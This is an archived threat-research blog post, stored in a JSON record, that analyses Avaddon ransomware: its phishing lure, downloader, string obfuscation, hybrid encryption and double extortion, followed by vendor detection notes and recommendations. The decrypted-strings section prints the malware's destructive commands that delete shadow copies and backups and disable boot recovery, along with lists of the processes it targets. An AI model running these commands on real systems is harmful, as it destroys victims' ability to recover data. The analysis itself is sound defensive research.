{
	"id": "10c50e67-d752-4f19-be4d-dc0ac2fb9e41",
	"created_at": "2026-04-06T03:36:57.042499Z",
	"updated_at": "2026-04-10T03:20:34.363191Z",
	"deleted_at": null,
	"sha1_hash": "10bfbae5ce208eb36cd731f966cd1d4a27206d75",
	"title": "Cybereason vs. Avaddon Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 857234,
	"plain_text": "Cybereason vs. Avaddon Ransomware\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-06 03:11:48 UTC\r\nOver the last few months, the Cybereason Nocturnus Team has been tracking the activity of the Avaddon Ransomware. It\r\nhas been active since June 2020 and is operating with the Ransomware-as-a-Service (RaaS) and double extortion models,\r\ntargeting sectors such as healthcare. Avaddon is distributed via malspam campaigns, where the victim is being lured to\r\ndownload the malware loader.\r\nkey findings\r\n• Classic Luring Technique: To lure the victim, the Avaddon loader is sent as a double extension attachment in phishing\r\nemails, tricking the victim into thinking an image of them was leaked online and sent to them.\r\n• Active Threat Group: Since its discovery in June 2020, Avaddon is still an active threat, marking almost a year of activity.\r\n• Hybrid Encryption: Avaddon uses a popular hybrid encryption technique by combining AES and RSA keys, typical to\r\nother modern ransomware.\r\n• Double Extortion: Joining the popular double extortion trend, Avaddon has their own “leaks website” where they will\r\npublish exfiltrated data of their victims if the ransom demand is not satisfied.\r\n• Use of Windows Tools: Various legitimate Windows tools are used to delete system backups and shadow copies prior to\r\nencryption of the targeted machine.\r\n• Detected and Prevented: The Cybereason Defense Platform fully detects and prevents the Avaddon ransomware.\r\nBackground\r\nThe Avaddon Ransomware was discovered in June 2020, and remains a prominent threat ever since. Their first infection\r\nvector was spreading phishing emails that were luring victims with a supposedly image of them, sending it as an email\r\nattachment. This in fact was a double extension JavaScript downloader that downloads and executes the Avaddon\r\nRansomware:\r\nAvaddon phishing email\r\nThe ransomware is written in C++ and can be recognized by the \".avdn\" extension that appends to the encrypted files in\r\ncertain versions. Avaddon uses a hybrid encryption method, similar to other modern Ransomware, using AES256 and\r\nhttps://www.cybereason.com/blog/cybereason-vs.-avaddon-ransomware\r\nPage 1 of 9\n\nRSA2048 encryption keys.\r\nAvaddon follows the popular double extortion technique by threatening to expose their victims' data on a dedicated “leaks\r\nwebsite” where they also post fragments of the stolen data as leverage to force payment of the ransom demand. As of early\r\nApril, 2021, the leaks website is live with multiple targets being extorted for payment:\r\nAvaddon leaks website\r\nThe Avaddon gang also recruits affiliates in hacking forums, similar to other known ransomware operators groups. In\r\nNovember 2020, Avaddon was reportedly delivered as a payload in Phorpiex Botnet spam campaigns. Phorpiex was\r\nrevealed in 2010 and reached one million infected users in its prime, being one of the oldest botnets on the market known to\r\nhave previously distributed other ransomware variants. In 2021, Avaddon added extra leverage to make their victims pay by\r\nusing DDoS attacks.\r\nJavaScript Downloader and Avaddon Analysis\r\nThe JavaScript downloaders are fairly simple and include the use of two built-in Microsoft tools, PowerShell and BITS, to\r\ndownload the ransomware payload from the C2 server and execute it:\r\nAvaddon download script\r\nAvaddon samples are generally not packed, and their main initial obfuscation technique is base 64 encoded strings. In order\r\nto reveal the plaintext strings, a XOR operation is performed after decoding the base64 string, adding 10 to each character,\r\nthen XORed once again:\r\nhttps://www.cybereason.com/blog/cybereason-vs.-avaddon-ransomware\r\nPage 2 of 9\n\nString decryption loop\r\nAfter decryption, the following strings are revealed which include commands that are executed to delete shadow copies and\r\nbackups, as well as important system paths to include/exclude while encrypting the system, the malware’s mutex name etc.:\r\nGlobal\\{8ACC12C0-4D9B-4F77-A47C-3592E699B86F}\r\nROOT\\CIMV2\r\nCreate\r\nWin32_Process\r\nCommandLine\r\nwmic SHADOWCOPY DELETE /nointeractive\r\nwbadmin DELETE SYSTEMSTATEBACKUP\r\nwbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest\r\nwbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0\r\nvssadmin Delete Shadows /All /Quiet\r\nbcdedit /set {default} recoveryenabled No\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\nSYSTEMDRIVE\r\nPROGRAMFILES(x86)\r\nUSERPROFILE\r\nProgramData\r\nProgram Files\r\nALLUSERSPROFILE\r\nAppData\r\nPUBLIC\r\nTMP\r\nTor Browser\r\nMSOCache\r\nEFI\r\n\\Windows\r\n\\WINDOWS\r\n\\Program Files\r\n\\Users\\All Users\r\n\\AppData\r\nhttps://www.cybereason.com/blog/cybereason-vs.-avaddon-ransomware\r\nPage 3 of 9\n\n\\Microsoft\\Windows\r\n\\Program Files\\Microsoft\\Exchange Server\r\n\\Program Files (x86)\\Microsoft\\Exchange Server\r\n\\Program Files\\Microsoft SQL Server\r\n\\Program Files (x86)\\Microsoft SQL Server\r\n\\Program Files\\mysql\r\n\\Program Files (x86)\\mysql\r\nDecrypted strings list\r\nWhen executed with Cybereason Anti-Ransomware prevention turned off, the the following execution of the Avaddon\r\nRansomware along with child processes can be observed using the Cybereason Defense Platform:\r\nAs seen in the Cybereason Defense Platform with Anti-Ransomware disabled\r\nAvaddon itself has various anti debugging techniques, including checking for the system locale using a library function in\r\nthis variant, but also listing analysis and VM-related tools that might interfere with its execution and reveal file extensions of\r\ninterest. This info is also hidden and decrypted using a slightly different algorithm:\r\nSecond strings decryption method\r\nBelow is a table of the decrypted strings. In addition, the ransomware note is also being decrypted in the same way:\r\nDecrypted strings\r\n.exe,.bin,.sys,.ini,.dll,.lnk,.dat,.exe,.drv,.rdp,.prf,.swp\r\n.mdf,.mds,.sql\r\nsqlservr.exe,sqlmangr.exe,RAgui.exe,QBCFMonitorService.exe,supervise.exe,fdhost.exe,Culture.exe,RTVscan.exe,Defwatch.exe,wxServerView.exe,sq\r\nDefWatch,ccEvtMgr,ccSetMgr,SavRoam,dbsrv12,sqlservr,sqlagent,Intuit.QuickBooks.FCS,dbeng8,sqladhlp,QBIDPService,Culserver,RTVscan,vmwar\r\nSecond method decrypted strings\r\nhttps://www.cybereason.com/blog/cybereason-vs.-avaddon-ransomware\r\nPage 4 of 9\n\nFor encryption, this variant uses the known hybrid encryption routine combining hardcoded AES and RSA keys:\r\nAvaddon AES and RSA encryption keys\r\nOnce the files are encrypted, for example, a Python installation path might look something like the following, while it can be\r\nseen that executable extensions were ignored and not encrypted:\r\nPython\r\ninstallation folder encrypted by Avaddon\r\nThe ransom note content directs the victim to the Tor payment website:\r\nhttps://www.cybereason.com/blog/cybereason-vs.-avaddon-ransomware\r\nPage 5 of 9\n\nAvaddon ransom note\r\nFinally, when browsing to the website mentioned in the ransom note, the victim can enter their unique ID and get the Bitcoin\r\nwallet and instruction of payment:\r\nAvaddon website for victim registration\r\nCybereason Detection and Prevention\r\nhttps://www.cybereason.com/blog/cybereason-vs.-avaddon-ransomware\r\nPage 6 of 9\n\nThe Cybereason Defense Platform detects the Avaddon executable with the Windows utilities that are executed and triggers\r\na Malop™ for it:\r\nWhen the Cybereason Anti-Ransomware prevention feature is enabled, the execution of the Avaddon samples are prevented\r\nusing the AI module:\r\nCybereason Defense Platform Detecting Avaddon\r\nSecurity Recommendations\r\n• Enable the Anti-Ransomware Feature on Cybereason NGAV: Set Cybereason Anti-Ransomware protection mode to\r\nPrevent - more information for customers can be found here\r\n• Enable Anti-Malware Feature on Cybereason NGAV: Set Cybereason Anti-Malware mode to Prevent and set the\r\ndetection mode to Moderate and above - more information can be found here\r\n• Keep Systems Fully Patched: Make sure your systems are patched in order to mitigate vulnerabilities\r\n• Regularly Backup Files to a Remote Server: Restoring your files from a backup is the fastest way to regain access to\r\nyour data\r\n• Use Security Solutions: Protect your environment using organizational firewalls, proxies, web filtering, and mail filtering\r\nLOOKING FOR THE IOCS? CLICK ON THE CHATBOT DISPLAYED IN LOWER-RIGHT OF YOUR SCREEN.\r\nMITRE ATT\u0026CK BREAKDOWN\r\nExecution\r\nPrivilege\r\nEscalation\r\nDefense Evasion Discovery Collection Impact\r\nhttps://www.cybereason.com/blog/cybereason-vs.-avaddon-ransomware\r\nPage 7 of 9\n\nCommand\r\nand\r\nScripting\r\nInterpreter\r\nApplication\r\nShimming\r\nVirtualization/Sandbox\r\nEvasion\r\nSystem Time Discovery\r\nData from\r\nLocal\r\nSystem\r\nData\r\nEncrypted\r\nfor Impact\r\n   \r\nDeobfuscate/Decode\r\nFiles or Information\r\nSecurity Software\r\nDiscovery\r\n \r\nInhibit\r\nSystem\r\nRecovery\r\n   \r\nObfuscated Files or\r\nInformation\r\nVirtualization/Sandbox\r\nEvasion\r\n   \r\n    File Deletion Process Discovery    \r\n     \r\nPeripheral Device\r\nDiscovery\r\n   \r\n     \r\nSystem Network\r\nConfiguration\r\nDiscovery\r\n   \r\n     \r\nFile and Directory\r\nDiscovery\r\n   \r\n     \r\nSystem Information\r\nDiscovery\r\n   \r\nAbout the Researcher:\r\nDaniel Frank\r\nDaniel Frank is a senior Malware Researcher at Cybereason. Prior to Cybereason, Frank was a Malware Researcher in F5\r\nNetworks and RSA Security. His core roles as a Malware Researcher include researching emerging threats, reverse-engineering malware and developing security-driven code. Frank has a BSc degree in information systems.\r\nAbout the Author\r\nhttps://www.cybereason.com/blog/cybereason-vs.-avaddon-ransomware\r\nPage 8 of 9\n\nCybereason Nocturnus\r\n \r\nThe Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government intelligence, and\r\nenterprise security to uncover emerging threats across the globe. They specialize in analyzing new attack methodologies,\r\nreverse-engineering malware, and exposing unknown system vulnerabilities. The Cybereason Nocturnus Team was the first\r\nto release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks.\r\nAll Posts by Cybereason Nocturnus\r\nSource: https://www.cybereason.com/blog/cybereason-vs.-avaddon-ransomware\r\nhttps://www.cybereason.com/blog/cybereason-vs.-avaddon-ransomware\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.cybereason.com/blog/cybereason-vs.-avaddon-ransomware"
	],
	"report_names": [
		"cybereason-vs.-avaddon-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775446617,
	"ts_updated_at": 1775791234,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/10bfbae5ce208eb36cd731f966cd1d4a27206d75.pdf",
		"text": "https://archive.orkl.eu/10bfbae5ce208eb36cd731f966cd1d4a27206d75.txt",
		"img": "https://archive.orkl.eu/10bfbae5ce208eb36cd731f966cd1d4a27206d75.jpg"
	}
}